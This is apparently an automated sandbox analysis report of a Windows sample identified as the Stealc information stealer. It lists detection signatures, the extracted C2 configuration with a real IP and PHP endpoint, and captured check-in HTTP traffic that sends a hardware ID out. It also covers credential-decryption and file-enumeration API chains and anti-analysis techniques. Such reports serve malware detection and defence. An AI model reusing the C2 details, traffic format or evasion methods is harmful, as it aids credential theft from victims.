
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525381
MD5: 93db12453ac29ad390cbd66f4b6dfd52
SHA1: 14dc9072be488c339f9c2bbc3711d9793bb7218b
SHA256: afd87eeb51cb2bd9ed4b52f0151ddf1f540d6c9fffb433eab0063c7edf1d093f
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 93DB12453AC29AD390CBD66F4B6DFD52)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6756 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6756 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.630000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T04:41:07.170847+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.630000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpO | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0063C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00637240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00637240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00639AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00639AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00639B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00639B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00648EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00648EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_006438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00644910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00644910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0063DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0063E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00644570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00644570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0063ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0063BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0063DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006316D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00643EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00643EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0063F6B0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 34 34 41 32 33 39 43 45 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a
    Data Ascii:
    ------BKKFHIEGDHJKECAAKKEB
    Content-Disposition: form-data; name="hwid"

    B944A239CE222838420810
    ------BKKFHIEGDHJKECAAKKEB
    Content-Disposition: form-data; name="build"

    doma
    ------BKKFHIEGDHJKECAAKKEB--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00634880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00634880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 34 34 41 32 33 39 43 45 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a
    Data Ascii:
    ------BKKFHIEGDHJKECAAKKEB
    Content-Disposition: form-data; name="hwid"

    B944A239CE222838420810
    ------BKKFHIEGDHJKECAAKKEB
    Content-Disposition: form-data; name="build"

    doma
    ------BKKFHIEGDHJKECAAKKEB--
Source: file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1787435060.0000000001473000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO
Source: file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37t

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009838C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEF909
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009542AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A06A7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A033E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096C3F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00990B30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00910B7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009FFD8E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A085CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00908ED1
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: bgdhafsv ZLIB complexity 0.9946423668963951
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00649600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00649600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00643720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00643720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7YVTSJKY.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1846272 > 1048576
Source: file.exe | Static PE information: Raw size of bgdhafsv is bigger than: 0x100000 < 0x19ca00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.630000.0.unpack :EW;.rsrc :W;.idata :W; :EW;bgdhafsv:EW;xszuyfga:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;bgdhafsv:EW;xszuyfga:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00649860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00649860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cc866 should be: 0x1c4a27
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: bgdhafsv
Source: file.exe | Static PE information: section name: xszuyfga
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ADD8E9 push 73CC9732h; mov dword ptr [esp], edi | 0_2_00ADD923
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ADD8E9 push 67787732h; mov dword ptr [esp], edx | 0_2_00ADD954
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0F8E8 push 0061FAD4h; mov dword ptr [esp], edx | 0_2_00A0F8F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009838C9 push 26C3E101h; mov dword ptr [esp], ebx | 0_2_009838D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009838C9 push 7D622260h; mov dword ptr [esp], edx | 0_2_00983950
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009838C9 push ecx; mov dword ptr [esp], esp | 0_2_00983954
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009838C9 push edx; mov dword ptr [esp], ecx | 0_2_0098398D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0064B035 push ecx; ret | 0_2_0064B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA38F2 push eax; mov dword ptr [esp], 7BD7FC97h | 0_2_00AA392C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA38F2 push edx; mov dword ptr [esp], 7FBFC220h | 0_2_00AA3958
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA38F2 push 76534052h; mov dword ptr [esp], ebp | 0_2_00AA39A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9480C push 5CFD2E90h; mov dword ptr [esp], esi | 0_2_00A94877
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A91017 push 60B77DDBh; mov dword ptr [esp], ebp | 0_2_00A90F42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A91017 push ebp; mov dword ptr [esp], 7D6A1ABEh | 0_2_00A910BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A91017 push 4403200Bh; mov dword ptr [esp], edi | 0_2_00A910D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E3031 push ebp; mov dword ptr [esp], edx | 0_2_008E308B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA41AB push ecx; mov dword ptr [esp], 7FBDB95Ch | 0_2_00AA413D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A781A4 push eax; mov dword ptr [esp], 6D3A9306h | 0_2_00A781E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A781A4 push edi; mov dword ptr [esp], ecx | 0_2_00A78265
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A291A7 push edi; mov dword ptr [esp], 5E2ED3E8h | 0_2_00A291E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB59B5 push 298F2091h; mov dword ptr [esp], ecx | 0_2_00AB59BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD798D push 2A4F7AD5h; mov dword ptr [esp], ebx | 0_2_00AD7DB6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE418C push eax; mov dword ptr [esp], 7E73E567h | 0_2_00AE41AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE418C push 14894D19h; mov dword ptr [esp], ebp | 0_2_00AE424B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A74992 push ebx; mov dword ptr [esp], ebp | 0_2_00A749DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABC1F4 push 541CEBF1h; mov dword ptr [esp], eax | 0_2_00ABC20C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABC1F4 push eax; mov dword ptr [esp], ecx | 0_2_00ABC213
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABC1F4 push 6B1CD144h; mov dword ptr [esp], ebp | 0_2_00ABC226
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC91B8 push edi; mov dword ptr [esp], esp | 0_2_00CC91C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC91B8 push edx; mov dword ptr [esp], ecx | 0_2_00CC91D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC91B8 push 26F3C893h; mov dword ptr [esp], edx | 0_2_00CC91E7
Source: file.exe | Static PE information: section name: bgdhafsv entropy: 7.952703648524724

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00649860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00649860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13444
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0E476 second address: A0E47B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0DAA5 second address: A0DAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0DAAF second address: A0DAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0DC2F second address: A0DC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB9C8FCBE96h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0DC3A second address: A0DC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 jo 00007FB9C8FCDCAEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0DDE6 second address: A0DDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10B66 second address: A10BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB9C8FCDCA6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FB9C8FCDCB0h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jnl 00007FB9C8FCDCB6h 0x0000001f jmp 00007FB9C8FCDCB0h 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FB9C8FCDCB1h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jmp 00007FB9C8FCDCB4h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C2A second address: A10C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB9C8FCBE98h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C48 second address: A10C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C4D second address: A10CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov di, 1BF7h 0x0000000c push 00000000h 0x0000000e mov edi, dword ptr [ebp+122D3741h] 0x00000014 call 00007FB9C8FCBE99h 0x00000019 pushad 0x0000001a jne 00007FB9C8FCBE9Ch 0x00000020 jl 00007FB9C8FCBE9Ch 0x00000026 ja 00007FB9C8FCBE96h 0x0000002c popad 0x0000002d push eax 0x0000002e ja 00007FB9C8FCBEA4h 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10CA2 second address: A10CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
